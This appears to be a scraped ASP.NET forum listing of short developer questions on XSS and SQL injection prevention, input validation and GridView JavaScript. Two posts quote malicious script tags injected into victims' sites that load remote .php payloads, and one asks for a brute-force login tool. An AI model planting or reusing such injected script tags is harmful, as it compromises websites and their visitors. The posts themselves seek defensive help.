C# - Javascript Injection Attack Prevention For Textboxes?

Nov 26, 2010

I have a textBox and a property to get and set its value:

public string SomeText
{
    get { return HttpUtility.HtmlEncode(textBox.Text); }
    set { textBox.Text = HttpUtility.HtmlEncode(value); }
}

I have used HtmlEncode to prevent Javascript injection attacks. After thinking about it though I'm thinking I only need the HtmlEncode on the getter. The setter is only used by the system and can not be accessed by an external user.

View 2 Replies


Similar Messages:

Security :: Protect Against SQL Injection Attack

Jun 21, 2010

Can the ASP.NET DropDownList and validation safely protect against SQL injection attacks?

View 7 Replies

SQL Server :: Create A 2005 New Login For SQL Injection Prevention

Sep 1, 2010

Our database was affected by SQL injection, so we need to create a new SQL Server 2005 login for SQL injection prevention. The user can access tables with select, update and delete queries, access views, functions and stored procs, and perform cursors. What are the permissions given for that login account?

View 1 Replies

Forms Data Controls :: Is The DetailsView Control Secure Against SQL Injection Attack

Jul 1, 2010

Is the DetailsView control generally safe from SQL injection attacks if the EDIT mode is displayed?

View 3 Replies

C# - When To Choose Javascript Injection From Code-behind Over External Js File

Jan 18, 2011

I'm working on a C# web app and I've to handle some javascript code.

I can do it both using javascript injection from my .cs file, which I'm doing now or choose to include my code into an external js file.

I would like to know when you would prefer to choose one way over the other.

According to me, it can be more clear to put code in external .js file and it can ease debugging.

Code injection from code-behind would however keep together all the necessary code for my component.

View 2 Replies

Asp.net - Is There Java Counterpart For 4's <%: %> XSS Prevention

Apr 9, 2010

I'm a developer moving from C# to Java. I heard about a new ASP.NET feature, <%: %>. It renders objects with HTML encoding. Only those implementing the IHtmlString interface are not encoded (to prevent double encoding). See more at http://weblogs.asp.net/scottgu/archive/2010/04/06/new-lt-gt-syntax-for-html-encoding-output-in-asp-net-4-and-asp-net-mvc-2.aspx

View 2 Replies

C# - Why Isn't ValidateRequest True Enough For XSS Prevention

Apr 1, 2010

In the notes for Step 1 in the "How To: Prevent Cross-Site Scripting in ASP.NET" it is stated that you should "not rely on ASP.NET request validation. Treat it as an extra precautionary measure in addition to your own input validation."

View 2 Replies

Asp.net - Client Validation That Acts The Same As Page Validator/XSS Prevention?

Feb 9, 2011

I've got a free text form for people to submit feedback/support requests. Occasionally people will paste in a support ticket or error log that contains something that triggers the .NET page validator as an XSS attempt. This takes the user to the error page as if the site choked on their input. Preferably, I'd rather have the page do some client-side validation when they press the save button before it's actually submitted. Is there a regex or some method I can hook into that would do the same basic check on the client side, or will I just have to write a regex that disallows certain characters altogether, like < and >?

View 1 Replies

Sql Server - XSS Attack On The Website

Sep 23, 2010

My website has been attacked by some malicious script < / title> < script src = http : // google-stats50.info/ur.php >. This script is appended to any column(s) of some table automatically. I have removed this script. But after a few hours, it re-appeared in some tables. But this time it is < / title> < script src = http : // google-stats49.info/ur.php >. My client is complaining about the script. The technology used is ASP.NET 1.1 and SQL Server 2005.

View 6 Replies

C# - Literal Control Vulnerable To XSS Attack?

Nov 1, 2010

I'm using a literal to display some javascript on a product page control. Basically what I'm doing is in my code behind I'm declaring a new stringbuilder, writing the script while inserting some dynamic variables to populate the script then setting the literal text to the stringbuilder. This leaves me open to xss attacks. What can I do to prevent this?

System.Text.StringBuilder sb = new System.Text.StringBuilder();
// loop through items in the collection
for (int i = 0; i < _prod.ActiveProductItemCollection.Count; i++)
{
    sb.Append("<script type='text/javascript'>");
    // add +1 to each item
    sb.AppendFormat("mboxCreate(\"product_productpage_rec{0}\",", i + 1);
[code]...

View 4 Replies

Security :: Prevent From Cross-Site Scripting Attack?

Oct 15, 2010

I have a major problem with a Cross-Site Scripting attack. Below is a sample script which automatically gets inserted into my HTML and ASPX pages.

"<script src=http://avidmarketing.ie/images/rc3/companybuttonwhite.php ></script>"

View 5 Replies

JQuery :: How To Validate A Textboxes Using Single Javascript Method

Jul 24, 2010

I am working on ASP.NET. For example, in a form there are 10 text boxes. I want to validate each textbox; if it is empty, it should display an alert message.

How can I achieve this by using a single JavaScript method? Can we pass a textbox as an argument into JavaScript, and how can this be achieved?

View 5 Replies

Forms Data Controls :: How To Get The Total Of Textboxes Using Javascript

Sep 29, 2010

I have a form where I have three textboxes and a GridView with two template textboxes. Now I need to get the total of all the textboxes, including the template textboxes, in another textbox named Total. I know how to get the total of textboxes using JavaScript. But now what I need is to get the total of all textboxes, including the template textboxes, in the Total textbox, and also the value of the Total textbox should change if I change the previously entered value of any textbox.

ie,if T1,T2,T3 are the textboxes and GridTxt1,Gridtxt2 are the Template textboxes then

Total=T1+T2+T3+GridTxt1+GridTxt2 and also [code].....

View 2 Replies

Security - Good Software To Dictionary Or Brute Force Attack IIS?

Jun 8, 2010

I am looking for something that takes an IIS/ASP.NET website that uses forms authentication and repeatedly tries to log in, either with all possible passwords or with passwords from a dictionary.

I can probably write something up, but I wondered if there was anything publicly available that would be better implemented.

View 3 Replies

Forms Data Controls :: Finding TextBoxes In GridView Using JavaScript?

Jan 26, 2011

I have 3 textboxes in a single column of a GridView, each with different id prefixes.

[code]....

Now I have around 3 radiobutton lists, one for each textbox on the page, on which the user can select a different color for each textbox style.

The problem is I want to change the style of all textboxes in the GridView in each row through JavaScript on color selection in the respective radiobutton list,

i.e. if radiobutton list 1 is for txtAcctPrefix, then on color selection all textboxes with this id should reflect the changes.

View 1 Replies

Web Forms :: How To Validate The Length Of The Text Present In The Textboxes Of A Gridview Using Javascript

Apr 6, 2010

Can anyone let me know "How to validate the length of the text present in the textboxes of a Gridview using javascript".

For example: In a page I am displaying a GridView with textboxes inside it and a button on the page. The user needs to input some text in the textboxes of the GridView and click on the "Submit" button. When the user clicks on the Submit button, we need to validate the length of the text present in the textboxes of the GridView. If the length of the text inside a textbox of the GridView is less than 10, we need to throw an error message. In the same way, we need to do validation for each and every textbox inside the GridView.

View 2 Replies

Data Controls :: Subtract Values From Textboxes Which Are Present Inside GridView Using JavaScript?

May 7, 2015

I have a GridView, that contains 3 Textboxes. Say Textbox1, Textbox2 & Textbox3

Now how do I subtract the value of Textbox1 & Textbox2 & show the result in Textbox3? How to do this in JavaScript?

View 1 Replies

Data Controls :: Multiply Values Of Two Columns Of GridView TextBoxes Using JavaScript And JQuery

May 7, 2015

Multiplication of two columns in gridview and display the result in third column using Javascript

View 1 Replies

Forms Data Controls :: Repeater Textboxes - Unable To Fetch The Values Of Textboxes

Aug 11, 2010

I have a repeater which is bound using a Collection of Entity Data Framework.

Once the repeater is bound using the datasource, the user can control the no. of rows present in the repeater using a DropDownList on the page. For example: if the datasource has 2 rows and the user wants to add 3 more rows, the user selects 5 from the dropdown, which adds 3 additional rows to the Repeater. I am able to do this.

The repeater has textbox controls in each row. Now once the user enters the values in the textboxes of the newly generated rows, the user can save the values entered with the no. of rows specified.

I have a button which is outside the repeater, and on click of this I need to validate all the textbox values and save them into the DB accordingly.

Here is my code

Repeater.aspx

[Code]....

[Code]....

Repeater.aspx.cs

[Code]....

Right now the problem is I'm not able to fetch the values of the textboxes present in the newly generated rows.

[URL]

View 1 Replies

VS 2008 Populate Some Textboxes, Autocomplete Textboxes And Then Save Changes?

Sep 30, 2010

I've done this using bound controls like Repeaters etc., but now I need to display information about a single file, for example. So I will pass the fileid in the querystring, then I need to populate some textboxes, autocomplete textboxes etc., and then save changes. What's the most efficient way of doing this?

View 13 Replies

How To Get RSS Feed Injection

Dec 15, 2010

I want to display the world's top 100 IT giants list, up to date, on my webpage. From where can I get the information? Is it possible to get the RSS feed for this?

View 4 Replies

Security :: SQL Injection Using Like %?

Feb 22, 2010

I want to know how my data could be compromised using a statement like SELECT [ID], [item], [price] FROM [Items] where item LIKE '%' + mitem + '%'" what line of could be considered an attack to the data.

View 16 Replies

Web Config Safe From SQL Injection And XSS

Nov 12, 2010

I've a blog-driven ASP.NET website. Under the post, there is a Comment block to let readers post comments. I've used some TextBoxes and a TextArea for that.

To prevent XSS: I've filtered the input by using the Server.HtmlEncode() method (I don't care about text formatting).

To prevent SQL injection: I'm using Linq To SQL (that should be like parametrized queries I think!).

ArticlesDataClasses dc = new ArticlesDataClasses();
ArticleComment newComm = new ArticleComment()
{
    ArticleID = int.Parse(Request.QueryString["ArticleID"]),
    CommentAuthor = Server.HtmlEncode(txtName.Text),
    // encode first, then turn line breaks into <br /> tags
    CommentText = Server.HtmlEncode(txtComment.InnerHtml).Replace("\n", "<br />"),
    CommentAuthorEmail = Server.HtmlEncode(txtMail.Text),
    CommentTime = DateTime.Now,
    Enabled = false
};

View 1 Replies

C# : Dependency Injection And Roles?

Jul 20, 2010

I have a page using an injected BLL service: a simple service returning a set of objects with a function like this:

public interface IMyService { List<Foo> All(); }

There is a default implementation for normal users. Now, I need users in the administrative role to be able to view more objects, with another implementation of the service. Where can I configure my page to use the second implementation?

My first solution is to put the dependency to the IUnityContainer in the page, and use it to resolve the dependency:

[Dependency]
public IUnityContainer Container { get; set;}

Page_Init(..) [code].....

It's a ServiceLocator and it's neither scalable nor testable.

View 2 Replies

C# - .NET Module Dependency Injection?

Jan 3, 2011

During the design of a new generic authentication framework for some of our products, I have come across an architectural issue I cannot seem to find a good solution for. I have tried to simplify the problem in order to easily explain it.

The library has two classes:

Manager: Is responsible for storing currently authenticated users.
Module: It is the responsibility for the module to validate each request according to security policies. The Module must ask the manager to determine whether a user is currently authenticated.

Now the manager is supplied an implementation of an interface which allows the manager to load users from a repository. The specific implementation is not contained in this library. Because of this, I cannot directly instantiate an instance of the repository within the library.

I have no way of modifying properties or supplying arguments for the module constructor. So my question is this, how can I give the module a reference to an instance of the Manager?

namespace Demo
{
public interface IRepository
{[code].....

View 4 Replies






